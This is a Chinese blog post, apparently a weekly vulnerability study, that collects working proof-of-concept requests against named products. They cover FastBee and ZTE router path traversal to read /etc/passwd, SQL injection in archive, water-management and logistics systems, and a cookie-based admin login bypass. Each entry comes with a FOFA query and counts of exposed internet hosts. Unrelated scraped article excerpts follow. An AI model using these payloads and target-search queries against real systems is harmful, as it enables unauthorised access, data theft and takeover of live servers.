9月第一周漏洞学习

news/2024/11/15 17:39:32/文章来源:https://www.cnblogs.com/LeouMaster/p/18403506

蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞

漏洞描述

FastBee是一款开源物联网平台,致力于为全球开发者提供稳定、搞笑的物联网解决方案。FastBee在download接口中存在任意文件下载漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害

fofa语法

"fastbee"

POC

http://xxx.xxx.xxx.xxx/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd

漏洞复现

fofa中搜索资产,共有724条数据匹配

image-20240908122031231

以下为登录页面以及页面特征

image-20240908122048818

构造payload发送数据包

image-20240908122321242

紫光电子档案管理系统selectFileRemote存在SQL注入漏洞

漏洞描述

紫光电子档案管理系统selectFileRemote存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏。

fofa语法

body="www.unissoft.com"

POC

POST /Archive/ErecordManage/selectFileRemote HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: */* Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencodeduserID=admin&fondsid=1&comid=1'

漏洞复现

fofa中搜索资产,共有186条数据匹配

image-20240908122758891

以下为登录页面以及页面特征

image-20240908122821500

当前页面进行抓包,构造payload发送数据包

image-20240908122928664

对JSON数据中的每个参数进行测试,判断具体的注入点位置

在userID和fondsid处我使用单引号以及and 1=1为判断出来,返回状态码均为200

在comid处输入单引号报错

image-20240908123212354

初步判断此处可能存在SQL注入,接下来判断一下闭合方式,使用--+以及#都无法进行闭合,猜测存在过滤

使用and '1可以闭合

image-20240908123344736

到这就可以确认存在SQL注入漏洞了,然后就是把数据包放到sqlmap中进行测试

中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞

漏洞描述

中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞,该漏洞可能导致敏感信息泄露、数据盗窃以其他安全风险,从而对系统和用户造成严重危害。

fofa语法

title="ZSRV2路由器Web管理系统"

POC

GET /css/../../../../../../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx

漏洞复现

fofa中搜索资产,共有123条数据匹配

image-20240908131546857

以下为登录页面以及页面特征

image-20240908131603719

当前页面抓包,构造payload

image-20240908131634143

无法直接访问http://xxx.xxx.xxx.xxx/css/../../../../../../etc/passwd,会提示404 not found

珠海新华通软件股份有限公司云平台存在登录绕过漏洞

漏洞描述

珠海新华通软件股份有限公司云平台存在登录绕过漏洞,漏洞允许攻击者通过简单操作,如添加特定Cookie或修改请求参数,绕过身份验证直接访问后台,从而对系统安全构成严重威胁。

fofa语法

icon_hash="513304261"

POC

POST /Main/Desktop/Default.aspx HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 166
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ASP.NET_SessionId=x01ftldfm5dwbbo1tx1ne1kv; #_SSO_Login_UserID=admin; #_SSO_Login_UserID_Guid=
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest

在浏览器中请求/Main/Desktop/Default.aspx,添加cookie为#_SSO_Login_UserID=admin,即可绕过登录进入后台

漏洞复现

在fofa中搜索资产,共有50条数据匹配

image-20240908133914350

以下为登录页面以及页面特征

image-20240908133942983

访问http://xxx.xxx.xxx.xxx/Main/Desktop/Default.aspx,然后添加cookie认证

image-20240908134022741

发送后即可绕过登录

image-20240908134104482

尝试点击了一些功能点后,可正常使用管理员权限

和达科技智慧水务综合管理系统UCCGSrv.asmx存在SQL注入漏洞

漏洞描述

和达科技智慧水务综合管理系统UCCGSrv.asmx存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库中的敏感信息,甚至在高权限的情况下进一步获取服务器系统权限。

fofa语法

body="skins/login/images/btn_login.jpg"

POC

POST /DataSrvs/UCCGSrv.asmx/GetMenuItem HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cookie: #_SSO_Login_UserID=admin
Priority: u=0, iname=*

漏洞复现

fofa中搜索资产,共有39条数据匹配

image-20240908140127683

以下为登录页面以及页面特征

image-20240908140200720

访问http://xxx.xxx.xxx.xxx/DataSrvs/UCCGSrv.asmx/GetMenultem,会提示缺少name参数

image-20240908140253363

当前页面抓包,修改请求方式为POST,添加name参数

image-20240908140456196

在name参数后面添加单引号查看报错

image-20240908140530349

出现报错,初步判断可能存在SQL注入,然后就是判断闭合方式了

image-20240908140711937

好了,现在可以确定是存在SQL注入漏洞了,把数据包放入到sqlmap中进行再次确认

image-20240908141434016

东胜物流软件SubCompSeaeDefAdapter存在SQL注入漏洞

漏洞描述

东胜物流软件的SubCompSeaeDefAdapter接口存在SQL注入漏洞,远程攻击者可以利用该漏洞获取数据库中的敏感信息,甚至在高权限的情况下,进一步获取服务器系统权限。

fofa语法

body="CompanysAdapter.aspx"

POC

https://xxx.xxx.xxx.xxx/FeeCodes/SubCompSeaeDefAdapter.aspx?CORPID=1*

漏洞复现

fofa中搜索资产,共有1319条数据匹配

image-20240908144650777

以下为登录页面以及页面特征

image-20240908144705692

访问https://xxx.xxx.xxx.xxx/FeeCodes/SubCompSeaeDefAdapter.aspx?CORPID=1

先确认是否存在SQL注入,在CORPID=1后面拼接单引号或者and 1=1判断注入类型

image-20240908144830691

从报错信息来看需要拼接单引号和小括号,然后进行闭合

image-20240908144921837

已经确认存在SQL注入漏洞了,接下来将URL放入到sqlmap中进行再次确认

image-20240908145825625

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/794194.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

AtCoder Beginner Contest 252 A~G 题解

前言这是我第一次写7题(A~G)的ABC题解,若有写得不好或者不到位的地方请多多指教,我将万分感激,感谢大家的支持!A - ASCII code 题目大意 给定正整数\(N\),输出ASCII码是\(N\)的字母。 \(97\le N\le 122\) 输入格式 \(N\) 输出格式 输出ASCII码是\(N\)的字母。 分析 注意…

苯乙烯

周线 日线: 60分钟: 短线看能否走出下跌五浪吧:观望

AtCoder Beginner Contest 205 A~E 题解

A - kcal 题目大意 我们有一种每\(100\)毫升含有\(A\)千卡热量的饮料。\(B\)毫升的这种饮料含有多少千卡热量? \(0\le A, B\le 1000\) 输入格式 \(A~B\) 输出格式 输出\(B\)毫升这种饮料包含的的千卡数。最大允许浮点数精度误差\(10^{-6}\)。 样例\(A\) \(B\) 输出\(45\) \(20…

AtCoder Beginner Contest 196 A~E 题解

A - Difference Max 题目大意 给定四个整数\(a,b,c\)和\(d\)。 我们要选择两个整数\(x\)和\(y\)(\(a\le x\le b\);\(c\le y\le d\))。输出最大的\(x-y\)。 \(-100\le a\le b\le 100\) \(-100\le c\le d\le 100\) 输入格式 \(a~~b\) \(c~~d\) 输出格式 输出最大的\(x-y\)。 样…

AtCoder Beginner Contest 173 A~D 题解

A - Payment 题目大意 如果使用价值\(1000\)元的纸币(假设有)支付\(N\)元,服务员会找多少钱? \(1\le N\le 10000\) 输入格式 \(N\) 输出格式 一行,即服务员找的钱数。 样例输入 输出1900 1003000 0分析 特判: 如果\(N\)除以\(1000\)能整除,那么不需要找钱,输出\(0\); …

AtCoder Beginner Contest 188 A~D 题解

A - Three-Point Shot 题目大意 有两个球队,分别得到\(X\)分和\(Y\)分,问得分较少的球队能否在获得三分后超越对方。 \(0\le X,Y\le 100\) \(X \ne Y\) \(X\)和\(Y\)都是整数。 输入格式 \(X~Y\) 输出格式 如果能,输出Yes;否则,输出No。 样例X Y 输出3 5 Yes分析 这个不用…

Eclipse安装包下载慢解决方法

最近开始学习Java,使用经典的Eclipse IDE,结果发现下载太慢……问题分析Eclipse的下载依赖于其他镜像,(在我这里)默认为朝鲜的镜像(可能在不同电脑中默认不同):点击Select Another Mirror:选择中国的镜像:

程序无法启动,因为您的计算机缺少msvcr71.dll。

背景 打开CrystalTile2这个软件出现此提示。 解决 有很多解决办法,最简单粗暴也是见效最快的就是直接从网上下载dll文件放到对应位置。 下载 https://msvcr71.dll-box.com/zh/自己存了一份,以免网址失效(虽然按道理来说一般不会失效)。 https://www.123pan.com/s/EhW3jv-IW…

Panasonic Programming Contest 2020 C (Sqrt Inequality) 题解

题目大意 输入三个整数\(a\),\(b\),\(c\),如果 \(\sqrt a + \sqrt b < \sqrt c\) 成立,输出Yes,否则输出No。 样例 输入 #1 2 3 9输出 #1 No\(\sqrt 2 + \sqrt 3 < \sqrt 9\) 不成立。 输入 #2 2 3 10输出 #2 Yes\(\sqrt 2 + \sqrt 3 < \sqrt 10\) 成立。 分析 错…

CodeForces Round #621 ABC (1307A+1307B+1307C) 题解

A. Cow and Haybales 题面 The USA Construction Operation (USACO) recently ordered Farmer John to arrange a row of n haybale piles on the farm. The \(i\)-th pile contains \(a_i\) haybales. However, Farmer John has just left for vacation, leaving Bessie all o…

Python函数之*[参数名]和**[参数名]的用处

一、*[参数名] 调用 合法调用 普通调用 *参数名一般写成*args, 如: def func(*args):print(args)可以试着调用func: >>> func(1) (1,) >>> func() () >>> func(1, 2, 3) (1, 2, 3) >>> func(dict(), set(), str(), int()) ({}, set(), ,…

discuz3.4文件包含漏洞

首先查看修复:可以看到新增代码preg_match("/^[\w-]+\.php$/i", $parse[path])) 来验证path是否为php文件,这个应该是修复路径遍历导致的文件读取漏洞。还有require ./.$_ENV[curapp]..php;这里应该是另外一个漏洞,因为$parse[path]和$_ENV[curapp]没有关联。 然后…